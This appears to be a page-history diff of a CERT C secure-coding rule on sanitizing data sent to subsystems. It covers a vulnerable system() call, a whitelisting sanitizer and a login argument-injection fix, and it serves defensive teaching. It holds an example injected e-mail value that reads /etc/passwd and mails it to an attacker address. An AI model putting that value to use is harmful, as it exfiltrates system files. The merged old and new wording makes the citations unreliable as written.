Page History

...

• command processor via a call to system() or similar function (also addressed in recommendation ENV03-C. Sanitize the environment when invoking external programs)
• external programs
• relational databases
• third-party COTS components -party commercial off-the-shelf components (for example, an enterprise resource planning subsystem)

...

sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);

The risk is, of course, that the user enters the following string as an e-mail email address:

bogus@addr.com; cat /etc/passwd  | mail some@badguy.net

For more info on the system() call, see recommendations ENV03-C. Sanitize the environment when invoking external programs and ENV04-C. Do not call system() if you do not need a command processor.

...

It is necessary to ensure that all valid data is accepted, while potentially dangerous data is rejected or sanitized. This can be difficult when valid characters or sequences of characters also have special meaning to the subsystem and may involve validating the data against a grammar. In cases where there is no overlap, white listing whitelisting can be used to eliminate dangerous characters from the data.

The white listing whitelisting approach to data sanitization is to define a list of acceptable characters and remove any character that is not acceptable. The list of valid input values is typically a predictable, well-defined set of manageable size. This example, based on the tcp_wrappers package written by Wietse Venema, shows the white listing whitelisting approach.

static char ok_chars[] = "abcdefghijklmnopqrstuvwxyz"
                         "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                         "1234567890_-.@";
char user_data[] = "Bad char 1:} Bad char 2:{";
char *cp = user_data; /* cursor into string */
const char *end = user_data + strlen( user_data);
for (cp += strspn(cp, ok_chars); cp != end; cp += strspn(cp, ok_chars)) {
  *cp = '_';
}

The benefit of white listing whitelisting is that a programmer can be certain that a string contains only characters that are considered safe by the programmer. White listing Whitelisting is recommended over black listingblacklisting, which traps all unacceptable characters because the programmer only needs to ensure that acceptable characters are identified. As a result, the programmer can be less concerned about which characters an attacker may try in an attempt to bypass security checks.

...

(void) execl(LOGIN_PROGRAM, "login",
  "-p",
  "-d", slavename,
  "-h", host,
  "-s", pam_svc_name,
  (AuthenticatingUser != NULL ? AuthenticatingUser :
  getenv("USER")),
  0);

An attacker, in this case, can gain unauthenticated access to a system by setting the USER environment variable to a string, which is interpreted as an additional command-line option by the login program. This is referred to as an This kind of attack is called argument injection attack.

Compliant Solution

The following compliant solution inserts the "--" argument before the call to getenv("USER") in the call to execl():

(void) execl(LOGIN_PROGRAM, "login",
  "-p",
  "-d", slavename,
  "-h", host,
  "-s", pam_svc_name,
  "--",
  (AuthenticatingUser != NULL ? AuthenticatingUser :
  getenv("USER")), 0);

...

The call to execl() is not susceptible to command injection because the shell command interpreter is not invoked. (See recommendation ENV04-C. Do not call system() if you do not need a command processor.)

...

Related Vulnerabilities

Search for vulnerabilities resulting from the violation of this rule on the CERT website.

...

MITRE CWE: CWE-88, "Argument Injection injection or Modificationmodification"

MITRE CWE: CWE-78, "Failure to Sanitize Data sanitize data into an OS Command command (aka 'OS Command Injection'"OS command injection")"

ISO/IEC 9899:19992011 Section 7.2022.4.68, "The system function"

Bibliography

...